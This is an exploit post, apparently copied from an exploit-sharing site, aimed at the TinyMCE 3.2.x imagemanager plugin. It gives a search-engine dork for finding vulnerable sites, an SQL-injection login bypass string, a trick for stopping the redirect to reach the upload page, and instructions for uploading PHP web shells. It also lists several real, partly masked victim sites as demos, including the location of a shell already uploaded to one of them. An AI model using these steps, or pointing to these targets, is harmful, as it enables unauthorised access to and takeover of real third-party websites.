TinyMCE v3.2.x <= (AuthBypass/ShellUpload) Multiple Vulnerabilites

########################################################
# Exploit Title  : TinyMCE v3.2.x <= (AuthBypass/ShellUpload) Multiple Vulnerabilites
# Author          : KedAns-Dz
# Platform       : PHP / WebApp
# Cat/Tag       : Shell / File Upload , Auth Bypassing , Multiple
# TinyMCE v3.2.7 or ..X is suffer from Multiple vuln's / bug :p
# Remote Attacker can bypassin auth and upload files , shell's etc...
# 1st try with this dork :
# google dork : allinurl:/plugins/imagemanager/pages/im/index.html
########################################################

# (1) how to bypass auth? =>
 you can bypass auth by simple poc of bypassing like
site.tld/jscripts/tiny_mce/plugins/imagemanager/login_session_auth.php
user & pass : '1'OR'1'
=+ demo's :
http://www.prodXgy-school.ru/jscripts/tiny_mce/plugins/imagemanager/login_session_auth.php
user : '1'OR'1'
pass : '1'OR'1'
http://www.ereX-komarovsky.co.il/admin/login.php
user: 1' OR '1'='1
pass: 1' OR '1'='1

&& or ( if the simple poc d'nt workin after u access : 
site.tld/js/tiny_mce-3.2.7/plugins/imagemanager/pages/im/index.html )
clic rapidly of the button stop in browser for stop the redirction ;) 

# (2) Upload Shell/Files .. (.txt .gif) or (.php by use temperData or http header :D ) =>
poc : site.tld/[path]/plugins/imagemanager/pages/im/index.html
and clic in ( upload / add / [+] ) button & upload what you need ;)
for ex: 
shell after up : http://www.prodigy-school.ru/data/r57.txt

=+ Demo's:
http://www.allemXdemusic.com.hostbaby.com/dashboard/js/tiny_mce-3.2.7/plugins/imagemanager/pages/im/index.html
http://gesundXit-gt.de/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html
http://www.yoXshiredales-stay.co.uk/maintain/tiny_mce/plugins/imagemanager/pages/im/index.html
http://www.eXz-komarovsky.co.il/admin/include/tinymce/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html
http://freeXhu/freewbr/tinymce/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html
http://volunteerXmckinney.galaxydigital.com/includes/tiny_mce/plugins/imagemanager/pages/im/index.html
http://www.easXtpennsd.org/progfiles/tinymce3JQ/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.htm
http://209.1XX8.74/progfiles/tinymce3JQ/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html

Leave a Reply


[ PLAYGROUND ]

Indonesian Coder || Codenesia || Exploit Database || Exploit ID || HN Community || devilzc0de || Packet Storm || cxsecurity